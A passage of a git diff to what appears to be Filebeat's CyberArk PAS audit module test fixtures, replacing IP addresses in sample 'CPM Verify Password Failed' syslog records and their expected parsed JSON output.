Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829597"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
 <7>1 2021-03-15T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 10:38:27</Timestamp>\n    <IsoTimestamp>2021-03-15T17:38:27Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Database-MySQL-10.0.1.20-root</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n</Reason>\n    <ExtraDetails>address=127.0.0.1;username=root;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"MySQL\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"root\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"127.0.0.1\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615829907\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"Port\" Value=\"3306\"></CAProperty>\n      <CAProperty Name=\"Database\" Value=\"test\"></CAProperty>\n      <CAProperty Name=\"DSN\" Value=\"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Database\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:38:27","IsoTimestamp":"2021-03-15T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829907"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
 <7>1 2021-03-15T18:00:07Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 11:00:07</Timestamp>\n    <IsoTimestamp>2021-03-15T18:00:07Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Database-MySQL-10.0.1.20-root</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n</Reason>\n    <ExtraDetails>address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"MySQL\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"root\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615831206\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"Port\" Value=\"3306\"></CAProperty>\n      <CAProperty Name=\"Database\" Value=\"test\"></CAProperty>\n      <CAProperty Name=\"DSN\" Value=\"mysql\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Database\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:00:07","IsoTimestamp":"2021-03-15T18:00:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615831206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
-<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 11:05:16</Timestamp>\n    <IsoTimestamp>2021-03-15T18:05:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"3\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615831516\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 02:50:19</Timestamp>\n    <IsoTimestamp>2021-03-16T09:50:19Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 11:05:16</Timestamp>\n    <IsoTimestamp>2021-03-15T18:05:16Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=3;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"3\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615831516\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 16 02:50:19</Timestamp>\n    <IsoTimestamp>2021-03-16T09:50:19Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;retriescount=4;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"4\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615888216\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log-expected.json
index a83355aff46e..82aa190cf563 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log-expected.json
@@ -2,41 +2,42 @@
     {
         "@timestamp": "2021-03-15T13:19:58.000Z",
         "cyberarkpas.audit.action": "CPM Verify Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
-        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
+        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615814397",
         "cyberarkpas.audit.ca_properties.last_task": "VerifyTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask",
         "cyberarkpas.audit.ca_properties.retries_count": "0",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC\\bart",
         "cyberarkpas.audit.desc": "CPM Verify Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.username": "ELASTIC\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
